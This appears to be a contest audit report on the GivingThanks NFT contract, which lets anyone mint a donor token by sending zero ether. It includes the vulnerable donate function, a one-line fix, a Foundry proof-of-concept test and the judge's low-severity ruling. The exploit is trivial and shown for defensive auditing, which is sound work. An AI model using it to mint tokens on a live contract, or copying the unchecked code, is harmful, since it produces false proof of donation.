GivingThanks

First Flight #28
Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: low
Valid

Anyone can mint an NFT by donating zero ether

Summary

Anyone can call the donate function with msg.value == 0 and still receive an NFT, because donate never checks the amount sent. The charity receives nothing, yet the caller gets a token whose metadata records a donation of 0. Since the only cost is gas, this makes the NFT collection worthless as proof of donation.

Vulnerability Details

The vulnerable function is shown below. The charity check is present, but there is no lower bound on msg.value before the transfer and the mint:

function donate(address charity) public payable {
    require(registry.isVerified(charity), "Charity not verified");
    // No check on msg.value: a call with value 0 passes straight through
    (bool sent, ) = charity.call{value: msg.value}("");
    require(sent, "Failed to send Ether");
    _mint(msg.sender, tokenCounter);
    // Create metadata for the tokenURI (records msg.value, so a zero donation is baked into the token)
    string memory uri = _createTokenURI(
        msg.sender,
        block.timestamp,
        msg.value
    );
    _setTokenURI(tokenCounter, uri);
    tokenCounter += 1;
}

Solution

function donate(address charity) public payable {
    require(registry.isVerified(charity), "Charity not verified");
    require(msg.value > 0, "Zero value is not allowed for donation"); // This should be added
    (bool sent, ) = charity.call{value: msg.value}("");
    require(sent, "Failed to send Ether");
    _mint(msg.sender, tokenCounter);
    // Create metadata for the tokenURI
    string memory uri = _createTokenURI(
        msg.sender,
        block.timestamp,
        msg.value
    );
    _setTokenURI(tokenCounter, uri);
    tokenCounter += 1;
}

Impact

Allowing zero-value donations renders the NFTs valueless as proof of giving: any address can mint an unlimited number of them, paying only gas, while the verified charity receives nothing. Each such token carries a tokenURI whose amount field is 0, so the collection cannot be relied on to identify real donors.

Tools Used

Foundry Test

Recommendations

Add a check to the donate function, before the transfer to the charity, that rejects zero-value donations:

require(msg.value > 0, "Zero value is not allowed for donation");

This ensures that only calls that actually transfer ether can mint an NFT. Note that msg.value > 0 still accepts a 1 wei donation; if the protocol wants the NFT to certify a meaningful amount, the check should compare against a minimum donation threshold chosen by the project rather than against zero.
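The following Foundry test is an added example written for this page, not the project's own test suite. It reproduces the donate logic from the finding in a small harness so it compiles stand-alone: MockRegistry stands in for the project's CharityRegistry (assumption: only isVerified is needed), DonateHarness inlines the donate function with a flag that toggles the missing check, and the tokenURI is simplified to "amount=<wei>" in place of the real _createTokenURI. It assumes forge-std and OpenZeppelin contracts (v5) are installed as remappings.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";
import {ERC721} from "@openzeppelin/contracts/token/ERC721/ERC721.sol";
import {ERC721URIStorage} from "@openzeppelin/contracts/token/ERC721/extensions/ERC721URIStorage.sol";
import {Strings} from "@openzeppelin/contracts/utils/Strings.sol";

// Assumption: a minimal stand-in for the project's CharityRegistry; only isVerified is exercised here.
interface IRegistry {
    function isVerified(address charity) external view returns (bool);
}

contract MockRegistry is IRegistry {
    mapping(address => bool) public verified;

    function setVerified(address charity, bool ok) external {
        verified[charity] = ok;
    }

    function isVerified(address charity) external view returns (bool) {
        return verified[charity];
    }
}

// Reproduction of donate() from the finding, not the project's full contract.
// requireValue toggles the missing msg.value check so one harness shows both behaviours.
contract DonateHarness is ERC721URIStorage {
    IRegistry public registry;
    uint256 public tokenCounter;
    bool public immutable requireValue;

    constructor(address _registry, bool _requireValue) ERC721("GivingThanks", "THANKS") {
        registry = IRegistry(_registry);
        requireValue = _requireValue;
    }

    function donate(address charity) public payable {
        require(registry.isVerified(charity), "Charity not verified");
        if (requireValue) {
            require(msg.value > 0, "Zero value is not allowed for donation"); // the proposed fix
        }
        (bool sent, ) = charity.call{value: msg.value}("");
        require(sent, "Failed to send Ether");
        _mint(msg.sender, tokenCounter);
        // Simplified metadata: the donated amount is the field that matters for this finding.
        _setTokenURI(tokenCounter, string(abi.encodePacked("amount=", Strings.toString(msg.value))));
        tokenCounter += 1;
    }
}

contract ZeroValueDonationTest is Test {
    MockRegistry registry;
    address charity = makeAddr("charity");
    address attacker = makeAddr("attacker");

    function setUp() public {
        registry = new MockRegistry();
        registry.setVerified(charity, true);
    }

    // Vulnerable behaviour: five zero-value calls mint five NFTs and the charity balance is unchanged.
    function test_ZeroValueMintsNFT() public {
        DonateHarness vulnerable = new DonateHarness(address(registry), false);
        uint256 charityBefore = charity.balance;

        vm.startPrank(attacker);
        for (uint256 i = 0; i < 5; i++) {
            vulnerable.donate{value: 0}(charity);
        }
        vm.stopPrank();

        assertEq(vulnerable.balanceOf(attacker), 5);
        assertEq(charity.balance, charityBefore);
        assertEq(vulnerable.tokenURI(0), "amount=0");
    }

    // Fixed behaviour: the zero-value call reverts, a real donation still mints exactly one token.
    function test_FixRejectsZeroValue() public {
        DonateHarness fixedContract = new DonateHarness(address(registry), true);

        vm.prank(attacker);
        vm.expectRevert(bytes("Zero value is not allowed for donation"));
        fixedContract.donate{value: 0}(charity);

        vm.deal(attacker, 1 ether);
        vm.prank(attacker);
        fixedContract.donate{value: 1 ether}(charity);

        assertEq(fixedContract.balanceOf(attacker), 1);
        assertEq(charity.balance, 1 ether);
        assertEq(fixedContract.tokenURI(0), "amount=1000000000000000000");
    }
}
```

Run with forge test --match-contract ZeroValueDonationTest. The first test is the proof of concept for the finding; the second shows that the single require line is enough to close it while leaving the normal donation path intact.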

Updates

Lead Judging Commences

n0kto Lead Judge 10 months ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-0-donation-mint-an-NFT

Likelihood: Low, anyone can mint an NFT with 0 amount. No reason to do it. Impact: Informational/Very Low, NFTs are minted to a false donor. An NFT with 0 in the amount section would be useless. Since that's a bad design and not expected, I'll consider it Low but in a real contest, it could be informational because there is no real impact.
